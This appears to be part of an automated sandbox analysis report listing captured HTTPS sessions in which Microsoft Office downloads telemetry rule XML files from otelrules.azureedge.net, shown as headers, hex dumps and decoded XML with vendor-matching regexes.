                                                  2024-10-31 19:50:35 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13192.168.2.45232713.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:34 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:34 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 408
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                  ETag: "0x8DC582BB56D3AFB"
                                                  x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195034Z-16849878b786lft2mu9uftf3y40000000b7g00000000gvfg
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14192.168.2.45232313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:34 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC563INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 3788
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                  ETag: "0x8DC582BAC2126A6"
                                                  x-ms-request-id: f39000d0-601e-0070-220e-2ba0c9000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-15b8d89586flzzksdx5d6q7g10000000056000000000513d
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192.168.2.45232413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:34 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 450
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                  ETag: "0x8DC582BD4C869AE"
                                                  x-ms-request-id: 67a0dec0-201e-006e-29f9-2abbe3000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-15b8d89586fpccrmgpemqdqe5800000004xg00000000555x
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16192.168.2.45232613.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:34 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC584INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 2160
                                                  Connection: close
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Vary: Accept-Encoding
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                  ETag: "0x8DC582BA3B95D81"
                                                  x-ms-request-id: cb5553aa-e01e-001f-3f7b-2a1633000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-17c5cb586f6f8m6jcqp9ufve6n00000000pg00000000ac26
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache-Info: L1_T2
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17192.168.2.45232813.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:35 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 471
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                  ETag: "0x8DC582BB10C598B"
                                                  x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-16849878b78j5kdg3dndgqw0vg0000000bkg000000010tf5
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  18192.168.2.45233013.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:35 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 474
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                  ETag: "0x8DC582B9964B277"
                                                  x-ms-request-id: 39bd4d12-701e-0098-1133-2a395f000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-15b8d89586fnfb49yv03rfgz1c00000001n000000000a2nb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19192.168.2.45232913.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:35 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:35 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 415
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                  ETag: "0x8DC582B9F6F3512"
                                                  x-ms-request-id: 8de36c9e-e01e-0003-7567-2b0fa8000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-17c5cb586f6z6tq2xr35mhd5x000000002p00000000037d1
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:35 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  20192.168.2.45233113.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:35 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:36 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 632
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                  ETag: "0x8DC582BB6E3779E"
                                                  x-ms-request-id: 3443e7a9-f01e-0085-6a6b-2a88ea000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-15b8d89586ff5l62pee56u9uc800000000q0000000006xtf
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:36 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  21192.168.2.45233213.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:35 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:36 UTC491INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:35 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 467
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                  ETag: "0x8DC582BA6C038BC"
                                                  x-ms-request-id: e84b733d-701e-005c-1bb8-26bb94000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195035Z-16849878b787wpl5wqkt5731b40000000ap000000000uthx
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  X-Cache-Info: L1_T2
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:36 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  22192.168.2.45233313.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:36 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 407
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                  ETag: "0x8DC582BBAD04B7B"
                                                  x-ms-request-id: 3c9c0adf-d01e-0028-0c96-257896000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195036Z-16849878b78q9m8bqvwuva4svc00000008kg000000006ggb
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
                                                  2024-10-31 19:50:36 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  23192.168.2.45233413.107.246.60443
                                                  TimestampBytes transferredDirectionData
                                                  2024-10-31 19:50:36 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Accept-Encoding: gzip
                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                  Host: otelrules.azureedge.net
                                                  2024-10-31 19:50:36 UTC470INHTTP/1.1 200 OK
                                                  Date: Thu, 31 Oct 2024 19:50:36 GMT
                                                  Content-Type: text/xml
                                                  Content-Length: 486
                                                  Connection: close
                                                  Cache-Control: public, max-age=604800, immutable
                                                  Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                  ETag: "0x8DC582BB344914B"
                                                  x-ms-request-id: 0fe0dd21-c01e-0066-771c-26a1ec000000
                                                  x-ms-version: 2018-03-28
                                                  x-azure-ref: 20241031T195036Z-16849878b787bfsh7zgp804my400000008rg00000000peav
                                                  x-fd-int-roxy-purgeid: 0
                                                  X-Cache: TCP_HIT
                                                  Accept-Ranges: bytes
